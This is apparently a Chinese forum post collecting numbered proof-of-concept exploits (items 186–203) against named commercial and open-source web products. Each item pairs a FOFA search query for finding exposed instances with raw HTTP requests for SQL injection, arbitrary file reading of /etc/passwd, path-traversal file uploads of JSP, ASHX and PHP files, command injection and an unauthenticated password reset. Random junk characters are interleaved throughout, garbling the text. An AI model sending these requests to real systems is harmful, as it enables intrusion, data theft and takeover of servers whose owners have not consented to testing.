GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
9 J5 h$ l: E7 N1 _' mHost: host
& m! B! {: j, \3 M3 R9 k$ x1 `
0 k# n3 p9 z% p. G
( ?7 L6 a) P2 }; e5 c, p8 ^186. F-logic DataCube3 SQL注入; B3 w+ x. z, r: J+ G
CVE-2024-31750
0 k/ ?1 J6 v/ C. G& s- CF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统9 f% @6 s4 K i4 t+ r; t' r
FOFA:title=="DataCube3"; \5 @7 L& e' ?- d% v
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1) `$ L, T9 q' F% H3 C: _
Host: your-ip0 }' U) W2 r& r e" s1 L% X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0: I) ]: }: C6 v: |5 v8 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
0 I( I' I' z) V {( ]1 e- U) `" fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 l" R( E% a$ p0 V
Accept-Encoding: gzip, deflate
q' i4 {) e" u# V) C" R) LConnection: close" t. `- y9 b% \( V, L. b
Content-Type: application/x-www-form-urlencoded2 i; _1 V" Y. b7 \0 Q
# N* O: _; A7 [) Vreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
2 n! u2 f) L9 c( D
T, Y/ j; |' R7 B
# B2 _7 L" q2 {& M6 @7 X8 R187. Mura CMS processAsyncObject SQL注入
8 d- ~) }7 s i" ]+ eCVE-2024-32640! j7 E1 j. r* j' x
FOFA:"Mura CMS"# I9 \' M( L8 i/ }# x& g, O/ Y7 Z* p
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
( T: a k+ H! s7 u* p, KHost: your-ip
3 C, {- k1 P) N; J/ yContent-Type: application/x-www-form-urlencoded
2 d; `; ]& B1 E2 A9 F
$ R" x1 `* _9 ~* V" o) o7 W2 R5 t _5 S- M0 K+ k8 e+ l
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1/ Z3 `; ?) x9 s0 f
+ Q& F& [! G8 H" c
4 `, I3 k/ E* X" k o( b- n188. 叁体-佳会视频会议 attachment 任意文件读取
9 {' D1 E" c5 m; D" C1 lversion <= 3.9.7
# U# H s9 S8 d3 c& \/ ~( |$ n1 lFOFA:body="/system/get_rtc_user_defined_info?site_id"
6 D/ \) T" h9 }6 k& O* S" PGET /attachment?file=/etc/passwd HTTP/1.1
' u! `3 \( @. @Host: your-ip
9 K3 _0 |. s/ z, t4 W& x6 e FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ `/ W2 x& [! J6 v9 I; wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 L* S( }7 a0 t( Z. K, D/ Q3 c0 |Accept-Encoding: gzip, deflate
9 E2 M% e2 ~7 d( jAccept-Language: zh-CN,zh;q=0.9,en;q=0.88 R! x f W( g2 B
Connection: close
, W# O) r0 M4 f* Z7 D- ?
* c$ [9 q) U7 d; R* l- F
% a1 c1 Y5 @8 N189. 蓝网科技临床浏览系统 deleteStudy SQL注入
0 R2 a! w% Z* d/ MFOFA:app="LANWON-临床浏览系统"( T9 D5 C: m0 X7 N$ _" H
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
4 T, M; p' N# q }* tHost: your-ip( x( c, T1 G* M G9 w( t# @ n" c
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36' x% W' U+ H8 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' j, X) ^) P% u4 \& B9 m* vAccept-Encoding: gzip, deflate
" C# J' c" O) u$ AAccept-Language: zh-CN,zh;q=0.93 T% N T5 T4 g3 h9 W9 ~# f/ d
Connection: close8 b* |/ ?5 S4 a7 p6 F. j
+ v: ?6 p6 `, f
$ Y+ F- i+ x8 h/ o190. 短视频矩阵营销系统 poihuoqu 任意文件读取
/ Z0 j* i6 T/ yFOFA:title=="短视频矩阵营销系统"& y& Z; z h+ c
POST /index.php/admin/Userinfo/poihuoqu HTTP/27 s( l' Z9 x4 W) C- ?1 F/ U; h, p
Host: your-ip
$ J7 ~) k9 x/ ~0 P$ ?9 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36, X/ A. j4 D! p6 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& R. e; t5 N vContent-Type: application/x-www-form-urlencoded/ n# g5 M* N# `
Accept-Encoding: gzip, deflate. S9 b+ P- r" h/ _
Accept-Language: zh-CN,zh;q=0.9
- w9 M1 J$ C, v; `0 i! G) G
- g6 o( v" M8 c0 |7 {( ^poi=file:///etc/passwd9 Q5 z4 {/ ]2 U) ?
+ j' d, m/ X* n2 q
1 d. I7 l/ C% L" B) L! o
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入2 j: J4 D3 \5 \3 ?5 h) u* g* h
FOFA:body="/CDGServer3/index.jsp"# V8 f+ Z- [, m: y
POST /CDGServer3/js/../NavigationAjax HTTP/1.16 ~/ c, T' G5 b- X3 p3 U/ p) V
Host: your-ip
" r- j9 Q/ q! `7 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; Q# r7 U- z; c. E6 vContent-Type: application/x-www-form-urlencoded# E, J; J9 K; W2 _
7 `1 B y# y; y4 \command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
7 \4 m8 f! j& A; t$ O% a" {( o q$ {- H1 a5 ]) w
8 [2 z$ d" C. `$ [1 _7 b192. 富通天下外贸ERP UploadEmailAttr 任意文件上传) g5 l' k# k7 W( ^
FOFA:title="用户登录_富通天下外贸ERP"9 J, J. `; ]4 m6 ^, r- u% A
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.10 ?6 U, }9 C A" w/ L/ I- }
Host: your-ip
% e" R& }5 y' @ vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; W3 U* D( M- }/ p
Content-Type: application/x-www-form-urlencoded; x" R$ s- i" p$ ^
; p- w( h3 D! i+ ?' K- i! ?- \1 O: x
, k ]7 h6 k+ N8 {
<% @ webhandler language="C#" class="AverageHandler" %>
$ L( W# f5 m! J2 z i R1 p) susing System;
8 z" R1 T3 u9 lusing System.Web;
3 @3 E7 p3 | m' i8 F/ n4 \6 S: apublic class AverageHandler : IHttpHandler: q1 Q/ \' S7 _# _8 ~! R
{3 i. b2 f5 ^& a& |5 I0 h
public bool IsReusable
4 s, o+ k+ o$ n/ G: T9 e6 }{ get { return true; } }8 E$ V: I# a4 Y: @1 L
public void ProcessRequest(HttpContext ctx)' D3 g! x! K% o+ w7 Z' T' p1 s: `% s
{
) K$ [. n& W: o) C# Nctx.Response.Write("test");
$ i* r- i9 f$ ]: ~$ A}
' X$ |' D1 j8 P}
$ L+ x: z. {; b* I4 X' S# f4 m( I# h9 g# L) G1 K2 Z6 @
6 V; V3 K% \! `
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行; h d' r* q/ H; m1 R
FOFA:body="山石云鉴主机安全管理系统"" N, }0 L# I/ J+ X
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
+ W/ ?/ {& U x2 O4 {* SHost:" |2 N- @, c- { z$ z; g& L4 Y# }" {
Cookie: PHPSESSID=2333333333333;
& ?& e2 r) \, o7 sContent-Type: application/x-www-form-urlencoded2 b8 h$ t/ O& Q- R4 P" V W2 T
User-Agent: Mozilla/5.06 l2 A; A3 l' m6 h9 N" W# \
( \' Z5 S+ f" d: y8 p1 ^3 k, p, d7 E$ Z$ y$ R. X
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1! ?$ q5 x3 K' O) E+ O
Host:9 Z, c% L9 \8 B/ e5 i( }7 o
User-Agent: Mozilla/5.0
0 h) D, X! {( r& F$ \2 XAccept-Encoding: gzip, deflate
( c* v+ ^% `/ Y9 \0 hAccept: */*
: i3 D# g5 ?( d6 Y! FConnection: close
* ?# Y) P) ^2 P Z1 OCookie: PHPSESSID=2333333333333;
/ i6 X4 g: i% Q- ?+ pContent-Type: application/x-www-form-urlencoded4 T- Y5 Y, n, I
Content-Length: 84$ m; H' A' q- ~7 E8 P/ t
P$ z4 t( {2 V' s0 h/ x: y; Qparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')1 r7 E d6 }" n2 a5 n' f% j% E" x
/ I7 |; {6 ^3 S. T V" z1 h
; f. e, s0 n" `1 u0 G, w! g1 a4 A0 b" P1 vGET /master/img/config HTTP/1.1
3 S; e* ]6 l% N; [' THost:
3 e+ t( a+ Q ]User-Agent: Mozilla/5.0
! h+ q" f. @' g U3 r0 z% ]% V! N( [+ @( p! |, L
3 ?. d# G; m1 o4 G194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传" K6 P1 J2 |6 ]& k S
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
D) X" ~/ _. y* F4 }- A3 i
' i+ s9 W' _% rPOST /servlet/uploadAttachmentServlet HTTP/1.1/ ~7 Q/ r2 F/ l& |
Host: host3 ]' a. X3 a/ m6 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.367 Q4 U( Z$ q4 E4 a7 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 w: {; R3 k% aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 d$ R* P. b; z( d9 p9 V: h- `Accept-Encoding: gzip, deflate
J' A; w# n& k5 G' k6 V6 NConnection: close$ e7 {0 M" P7 x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk' ]; C: Z' S! X* o
------WebKitFormBoundaryKNt0t4vBe8cX9rZk" l1 ^) g' C4 f- K2 x+ F
( i; k& j# A( H- H% [
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
" Z7 X! n$ e4 Z9 Q1 I) X% ZContent-Type: text/plain# D' x" O/ [. \
<% out.println("hello");%>
7 f7 [, p& {* v2 D: ^------WebKitFormBoundaryKNt0t4vBe8cX9rZk
7 @- V5 U1 H, Q; d1 wContent-Disposition: form-data; name="json"
9 \4 X! `8 V, K {"iq":{"query":{"UpdateType":"mail"}}}1 a3 F6 \" _* i
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--& Q( S) Q, V" }- N6 @
& _" Y- p& e7 ~: Y$ m1 S
& x2 x* A* l/ ~' v3 t: q+ I
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行+ P# K' N+ [6 O
FOFA:title=="飞鱼星企业级智能上网行为管理系统' b- f! s* H& M" J1 P' v# y7 M
POST /send_order.cgi?parameter=operation HTTP/1.1( u1 P9 L& u* B- x9 T( e
Host: 127.0.0.11 {; a+ x+ O$ f6 g( ]5 c
Pragma: no-cache
" C e: r8 n4 q& o5 h* E vCache-Control: no-cache( d0 n2 t, m7 X7 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
3 A4 f/ p1 ~+ J, G. J8 R. M$ @# _Accept: */*7 ?9 \5 j9 x& l2 r
Accept-Encoding: gzip, deflate S' y; y9 S" u, T- L
Accept-Language: zh-CN,zh;q=0.98 f9 u1 I; p2 N, I1 P, e ?. a
Connection: close+ N% P& F7 j7 k
Content-Type: application/x-www-form-urlencoded
4 l# _" A& }0 {% HContent-Length: 68
0 b1 r: k6 Q. s. X; a* L- e- R/ A: }! K6 O6 O3 @
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}1 h4 X c0 v* \$ S. k1 b
& B! I1 c2 D1 Q% I9 R+ J; n, n: v# \5 @/ X2 M9 S9 m
196. 河南省风速科技统一认证平台密码重置
; B/ a5 W1 K' P4 TFOFA:body="/cas/themes/zbvc/js/jquery.min.js"" W9 K" g) k9 A. ^* M/ W( k4 U
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
( b; A/ ~- T: j' ~2 v6 w% \* xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' ?. O# m$ k5 _+ C4 e5 VContent-Type: application/json;charset=UTF-8/ u+ z% A; }* _8 q9 }- M, [" T% L5 B
X-Requested-With: XMLHttpRequest6 Q. K! j4 ?4 z0 a
Host:: H" R1 b, @! m0 |/ k( t6 P% H
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.25 H& e3 u; d# S7 ]7 h2 g, V
Content-Length: 45
+ W6 i# l% V. n- }0 ~- rConnection: close
& L$ {* Y. `" a/ r
1 J; |% @4 F2 k/ L K' @9 I3 J7 }{"xgh":"test","newPass":"test666","email":""}
- W1 V( a! M! R: Q* X9 d6 O# g5 ~6 a% S; {
' o4 q& r" j) U# Q
( `! s8 N% t0 b4 F/ f197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
( m0 ?1 P1 d' D2 H5 G/ v5 w( ZFOFA:app="浙大恩特客户资源管理系统"8 o# ^% \- m0 J% i9 B
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
$ V: w" J4 \ ~% }3 l, C/ I* zHost:4 w1 z. P$ e& p$ m8 p) S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
" V4 l7 u3 Y1 J( w; LAccept-Encoding: gzip, deflate5 F! e+ }- S p0 C& ]
Connection: close
5 t, ]3 z6 l3 K* o Q0 o9 [' `8 C) T4 c( z6 G
- `& B5 {/ S: e4 k4 p8 w" j3 o
Q) c; Q' Z, ^198. 阿里云盘 WebDAV 命令注入 z& B6 k* D. Q$ X) U3 Z
CVE-2024-29640
8 b0 |9 t) P# ~GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.18 T6 u/ X$ A, j' r# Z9 ]8 p
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf649 ^% |8 R. d' y4 V
Accept: */*/ A+ A! Z6 t6 u2 y( {( {) G
Accept-Encoding: gzip, deflate: T0 ~+ K8 r1 i1 W& `" q
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.67 ~$ ?! _$ h, q9 K
Connection: close
! x0 I3 w" M9 U! ]* f. }5 [4 n, q- F3 A: {+ T+ x1 i5 S
% @; X- h6 H+ n, y
199. cockpit系统assetsmanager_upload接口 文件上传3 f+ i% l7 ~% t6 |$ v5 H( R8 h
9 y, w3 o7 Q+ m6 n$ D3 X) b1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
* B. P; o" N3 _$ tGET /auth/login?to=/ HTTP/1.1, p. R0 E% l/ o
0 T- u: U& ?. X6 U. Y
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
* ^4 ]0 G7 g. L- c. v2 f8 G% v+ p, v9 x# ]7 A
2.使用刚才上一步获取到的jwt获取cookie:
; z: v$ p; R p0 i1 g4 f% S
7 ^& q& J! ]* r5 BPOST /auth/check HTTP/1.1
1 }$ W; X! u1 M% G8 j7 T! mContent-Type: application/json
2 A1 w! I+ X0 o- b) z- _' b/ s
3 C& {/ ?* ^; d- m' [# r4 M{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
* c% m1 h5 T! a0 ]& k' ^4 p& a" ^5 R3 ?
响应:200,返回值:
% B% e& G% A! }( X, ?! ISet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/3 M- v3 U" I" e/ I& z: H
Fofa:title="Authenticate Please!"
+ r q* W/ k' l5 j& P& D: jPOST /assetsmanager/upload HTTP/1.1! m% R. z z" X) T/ f4 @
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3$ b: a" \/ B" R+ K- v) M
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92: C! F" S8 @' G# H; L( o2 n
" a: M) ^6 M; ^ h
-----------------------------36D28FBc36bd6feE7Fb3
+ l- E- J2 K9 m, e ]. k: WContent-Disposition: form-data; name="files[]"; filename="tttt.php"
: m* B0 b( y/ N/ K$ NContent-Type: text/php: E) R2 q- X( |) V4 I
9 E* ?- `8 v; W$ Y8 J/ z7 k1 v<?php echo "tttt";unlink(__FILE__);?>9 ~& R" O5 p' ^ x: u
-----------------------------36D28FBc36bd6feE7Fb3; V4 l' n, [$ y; M& i+ t$ ~# W* `; Q6 R
Content-Disposition: form-data; name="folder"4 j/ U7 b, Q) o" h3 f9 P% [
( H2 g+ ]5 Q( w5 x8 _, ]/ r
-----------------------------36D28FBc36bd6feE7Fb3--
3 T- _" f r' L! y* X2 i3 @7 i6 |7 E9 U! ?5 U- U
+ h2 i) K% H m J9 o
/storage/uploads/tttt.php) y* `4 E! H" _- w
* `7 R, U1 w8 J, J200. SeaCMS海洋影视管理系统dmku SQL注入
+ p4 L; Z* j4 ^) GFOFA:app="海洋CMS"
! @3 ~9 J/ C( t; _GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.17 w1 u/ U9 [% J1 X, h4 P
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s( F6 v z6 B/ I9 o+ \' @7 U
Upgrade-Insecure-Requests: 1
! O0 r5 {8 A5 L8 {Cache-Control: max-age=0
4 s3 P; f- u% w9 Y5 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 F, e( V6 d5 I* e
Accept-Encoding: gzip, deflate6 v2 z E9 d9 B9 f: E
Accept-Language: zh-CN,zh;q=0.9
* E: k) D" z2 y$ b7 e4 d, b% q5 G: p' t
& d' ~$ N2 l: A9 w1 c* R' U201. 方正全媒体新闻采编系统 binary SQL注入
8 n/ R% [5 ~ h0 X% B iFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
# w( F1 M( @$ |- B" gPOST /newsedit/newsplan/task/binary.do HTTP/1.1) D, B- j6 r5 M
Content-Type: application/x-www-form-urlencoded3 Q8 ?9 J9 X" ~) L) M& _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 S1 f5 S$ a+ T, Z# e5 t ^0 |
Accept-Encoding: gzip, deflate
8 Q% R- D: I/ a1 h+ {Accept-Language: zh-CN,zh;q=0.9
- K8 F, V$ s( e) l: ?4 Z9 vConnection: close! ?, F. n. Q' J; d4 T! U: W( E7 A
+ ~7 a. s* Y/ D) R
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
6 Z: ^- e2 q+ _! A: P, l- l3 i' Z+ P; b2 S) _# }
' L& ?, o3 u/ |+ k( n7 E# r% N202. 微擎系统 AccountEdit任意文件上传; s1 c, W) d% r& R6 a
FOFA:body="/Widgets/WidgetCollection/"
8 X6 R. e6 G) x0 q. m" X获取__VIEWSTATE和__EVENTVALIDATION值
" [5 B- p0 ^* l( sGET /User/AccountEdit.aspx HTTP/1.1
5 V: t! s" e; y8 l! qHost: 滑板人之家& h+ A0 ]8 W' N7 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
/ A: e* ]. O ]* v7 k. b6 k+ aContent-Length: 0( Q: e# d! K& ~6 k- E
4 S" ]% L, v# y" p
4 ^. C9 |1 K/ R替换__VIEWSTATE和__EVENTVALIDATION值- T* g! k8 Y* E% D, J7 _+ e
POST /User/AccountEdit.aspx HTTP/1.17 \: k* b- c5 v! l" C' E F% o
Accept-Encoding: gzip, deflate, br
& w& ~+ q ]4 Y! u/ |: gContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687, L6 m+ a/ Y! K
& W! M: c3 l, E6 _ Q. A6 t-----------------------------786435874t38587593865736587346567358735687
I( ?: j% H; D$ C0 G0 T/ iContent-Disposition: form-data; name="__VIEWSTATE"5 c- }( u) V' H7 V
, b; Y! y) H) G% f( D: W# z
__VIEWSTATE5 @# D( L# R* T9 D
-----------------------------786435874t385875938657365873465673587356873 H0 ~8 m V7 S2 K
Content-Disposition: form-data; name="__EVENTVALIDATION"9 Y2 O9 u) g" O' t7 K
$ m; ?. ~3 w5 D. h__EVENTVALIDATION
7 S* I& W+ x ?5 }9 u-----------------------------786435874t38587593865736587346567358735687
7 O7 E/ r F' W& Z; ?! ?+ NContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
7 N' E4 H3 U4 ^. u3 JContent-Type: text/plain- ]4 d( u+ k' @7 O8 }
- f! B1 v, d* c' P) n* q. o. [1 XHello World!( }' Z' T; Q. M8 W) }. y( ~- a5 d+ X0 |2 R
-----------------------------786435874t38587593865736587346567358735687& @. P: s ]2 g% I, i: b4 o
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"4 p. S7 G, N) `
$ V. X. W* H5 g. ]8 U; P
上传图片8 \3 {# g/ j4 K2 B, C
-----------------------------786435874t38587593865736587346567358735687 ]8 {1 J9 F. A+ O2 f( S) G1 T' G
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"! R ?/ ~1 }& Q* J+ p/ m) y
3 P, M: a7 p# j; M
y2 b* t$ T' }& R2 `" G-----------------------------786435874t38587593865736587346567358735687
8 t: G; J s8 s" m- B! cContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"( I* j0 V3 B: o& P6 ^1 _% ]
3 n7 V' ~, A/ V8 e
R. g) q: G% r3 u5 ^-----------------------------786435874t38587593865736587346567358735687--
8 E. }- j; O7 u1 O5 \+ C
/ H, M, q+ }+ a0 J) f" m; A1 r! n7 @
/_data/Uploads/1123.txt" x( M0 G* m- |& C# b L
$ n5 U: q) r% H( n203. 红海云EHR PtFjk 文件上传
2 V: n( v; f. m; x* QFOFA:body="RedseaPlatform"% I! d4 S, }1 l6 O" }
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
" \) i, }& J$ b: p* w6 A {Host: x.x.x.x
8 k$ d; w2 G/ w- J. XAccept-Encoding: gzip
- T" ~4 D& c( cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; Q1 M! m8 X& ]" r! e; w6 @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
4 y, k+ I; C( {8 MContent-Length: 210
7 H: Q9 \% s# A, |5 \, \" d- X4 u- R
8 A A, T) o8 V n- h, w------WebKitFormBoundaryt7WbDl1tXogoZys4
8 \* ]' t+ A5 sContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
4 p5 H3 M0 E# SContent-Type:image/jpeg, b! c$ o! x6 ]
. O$ M+ F& N" L6 Z9 J, e0 k: H<% out.print("hello,eHR");%>" ~# A. t5 l7 v* h4 P' Y( ?) t' s
------WebKitFormBoundaryt7WbDl1tXogoZys4--
) t0 y V' ?0 s: N8 j0 y0 ]# |. Y
8 a- W. ]7 b" H% g; C( r2 W% e/ O4 X, C4 a- Q0 z
$ ^1 }2 h( k9 R% |+ U7 T2 o8 M2 u$ p- m" P. t
" a% S$ Q; k9 v |
发表于 2024-6-5 14:31:29
收藏
支持
反对